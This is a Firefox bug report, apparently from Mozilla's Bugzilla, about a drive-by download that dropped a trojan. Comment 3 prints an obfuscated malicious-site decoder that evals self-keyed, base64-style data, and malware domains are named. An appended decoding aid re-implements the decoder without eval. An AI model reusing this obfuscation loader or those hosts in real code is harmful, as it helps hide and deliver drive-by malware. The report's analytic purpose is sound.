Closed
Bug 347959
Opened 18 years ago
Closed 17 years ago
Security problem, related to javascript
Categories
(Firefox :: Security, defect)
Status: RESOLVED INCOMPLETE
People
(Reporter: tester666, Unassigned)
Attachments (1 file): 2.04 KB, text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6

Fault in javascript security: while searching for bus timetables on a site, my antivirus alerted for a file called "ms.exe" dropped onto the automatic startup folder.

Solutions I found:
a. Block the browser from opening "http:// js.gbeb.cc / advertizing /" (I used the "hosts" file trick to prevent any browser from browsing that ****.)
b. Turn javascript off.

Notes: I noticed that **** page has a script that's encrypted, but the string arguments.callee.toString().replace is in clear text. I think it somehow uses that function.

Reproducible: Always

Steps to Reproduce:
It's already explained in the "details" part.

Actual Results:
A trojan ("ms.exe") is dropped to the startup folder. I dunno what the exe can do, but it's not good to have **** dropped to the startup folder.

Expected Results:
Refuse the action?

It may apply to other Fx versions and related software. Please find a way to fix this. It's possible that many other sites are using such a way. I dunno if this has been reported before, and say "sorry" from now for I'm too lazy to check out, but sincerely I don't have the time to do. I hope this report can be helpful for someone.
Comment 1•18 years ago
In order for this report to be useful we need to have enough information to reproduce the issue. What site were you browsing that did this? What anti-virus software do you have? When was the last time you updated Windows with security updates? What plugins and extensions and their versions do you have installed? You can find plugins by typing about:plugins in the url bar and you can find the extensions installed in the Tools Extensions menu.
Comment 2•18 years ago
Comment 3•18 years ago
The initial evil sets some variables (is appName "Netscape" or not, is Java enabled, EXLogin='itother', etc.) and loads an iframe with abusecenter.org (DON'T LOAD). This is a newly registered domain (26-July-2006) that looks like a copy of the SpamCop abuse reporting form, but includes some more obfuscated code inline. This code uses basically the same decryptor as that above, but the decrypting key ('P') is different and it's passed different content:

<script type="text/javascript">
// name="url_check" value="true"
document.write('<input name="ref" id="ref" type="hidden" value="'+document.referrer+'">');
function d(xC,P){if(!P){P='8TGDuz:;rl*L&^#dIMg+w|?7,@mtpb2Fi)-UvK0N5jyC/SE41VYRkZAJO(6q.f3=';}var e;var VT='';for(var I=0;I<xC.length;I+=arguments.callee.toString().replace(/\s/g,'').length-535){e=(P.indexOf(xC.charAt(I))&255)<<18|(P.indexOf(xC.charAt(I+1))&255)<<12|(P.indexOf(xC.charAt(I+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)|P.indexOf(xC.charAt(I+3))&255;VT+=String.fromCharCode((e&16711680)>>16,(e&65280)>>8,e&255);}eval(VT.substring(0,VT.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));}
d('@:fUb?ZKtNIEbJljb:w5lRVjtNTZbGTE,?ZKdglZp0VF,A)K,A/-r:KvdglZp0VF,A)K,A/-r;M(p:wfr0)j@:MKt-rib0z/b?wfrNMYb?w-d-pj#Y8i');
</script>

This decrypts to an innocuous-looking document.write() of a hidden "url_check" field in the form. Very suspicious, but nothing actually malicious. I wonder if they can tell I'm poking around and serve up alternate content?
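As an added example (not code from the bug report or from Mozilla), this is a static re-implementation of the decoder d() quoted in comment 3, with the arguments.callee.toString() length checks replaced by the constants they evaluate to (step 4, shift 6, two padding bytes), so an analyst can decode the payload for inspection without eval() and without loading the attacker's page. The alphabet and payload are the ones quoted in the comment; the function names are mine.

```javascript
"use strict";
// Static re-implementation of d(xC, P) from comment 3 (analysis aid, not the
// original script). The original derives its loop step, shift and padding
// length from its own minified source length:
//   arguments.callee.toString().replace(/\s/g,'').length - 535  -> 4 (step)
//   ...                                             - 533  -> 6 (shift)
//   ...                                             - 537  -> 2 (padding)
// so any edit to the function body silently corrupts the output. With the
// constants fixed, the scheme is ordinary base64 over a shuffled alphabet.

// Decrypting key 'P' exactly as quoted in comment 3.
const ALPHABET = '8TGDuz:;rl*L&^#dIMg+w|?7,@mtpb2Fi)-UvK0N5jyC/SE41VYRkZAJO(6q.f3=';

// Encoded argument passed to d() in comment 3.
const PAYLOAD = '@:fUb?ZKtNIEbJljb:w5lRVjtNTZbGTE,?ZKdglZp0VF,A)K,A/-r:KvdglZp0VF,A)K,A/-r;M(p:wfr0)j@:MKt-rib0z/b?wfrNMYb?w-d-pj#Y8i';

// Decode four 6-bit symbols at a time into three bytes, mirroring the
// original's bit layout, then drop `trailing` padding bytes. Returns the
// decoded text instead of passing it to eval().
function decodeCustomBase64(encoded, alphabet = ALPHABET, trailing = 2) {
  let out = '';
  for (let i = 0; i < encoded.length; i += 4) {
    // indexOf('') is 0 and indexOf(unknown) is -1 (& 255 -> 255), same as the original.
    const e = (alphabet.indexOf(encoded.charAt(i)) & 255) << 18
            | (alphabet.indexOf(encoded.charAt(i + 1)) & 255) << 12
            | (alphabet.indexOf(encoded.charAt(i + 2)) & 255) << 6
            | (alphabet.indexOf(encoded.charAt(i + 3)) & 255);
    out += String.fromCharCode((e & 0xff0000) >> 16, (e & 0xff00) >> 8, e & 0xff);
  }
  return out.substring(0, out.length - trailing);
}

// Decodes the comment 3 payload: the hidden "url_check" input the comment describes.
function decodeComment3Payload() {
  return decodeCustomBase64(PAYLOAD);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(decodeComment3Payload());
}
```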
Comment 4•18 years ago
SANS has an article on what appears to be a variant on this, perhaps an earlier version since the replace(/\s/g,'') in this version appears to get around the IE vs Firefox differences noted in the article. http://isc.sans.org/diary.php?storyid=1519
Comment 5•18 years ago
I should mention that the page that loads the fake spamcop site "abusecenter.org" in an iframe also loads an image with parameters set by the first obfuscated code.

<img src=http://e1.extreme-dm.com/s10.g?login=itother&jv=y&j=y&srw=1400&srb=32&l=http%3A//somesite.tld>

Even though you pass in information about things like whether Java is enabled ("jv=y") it doesn't seem to affect the content of the abusecenter.org site and I'm not seeing where the malware is coming from.
Whiteboard: [sg:needinfo]
(In reply to comment #1)
> What site were you browsing that did this?
It's explained before.
> What anti-virus software do you have?
eWido
> When was the last time you updated Windows with security updates?
Every day
> What plugins and extensions and their versions do you have installed? You can find plugins by typing about:plugins in the url bar and you can find the extensions installed in the Tools Extensions menu.
Plugins: npnul32.dll NPSWF32.dll NPOFFICE.DLL (11.0.5510) npdrmv2.dll npdsplay.dll npwmsdrm.dll.
Comment 7•18 years ago
> What site were you browsing that did this?
> It's explained before.

js.gbeb.cc doesn't appear to contain bus timetables so it can't be the site you were browsing. Since the decrypted code doesn't appear to do anything bad (though it's very suspicious for how little it appears to do) there may be some key parameters passed in from the containing page that don't appear directly in the script you linked.

> Plugings: npnul32.dll NPSWF32.dll

What version of Flash?
Comment 8•18 years ago
What version of Windows Media Player are you running, do you have the Microsoft update to fix MS06-006? I saw another site with identical initial exploit format, with a different EXlogin and EXrsrv that eventually downloaded an attack using that flaw. But I never found that code in this case from this particular server when I tried to follow the trail so maybe this is using a different exploit.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•17 years ago
Status: NEW → RESOLVED
Closed: 17 years ago
Resolution: --- → INCOMPLETE
Whiteboard: [sg:needinfo]
Updated•17 years ago
Group: security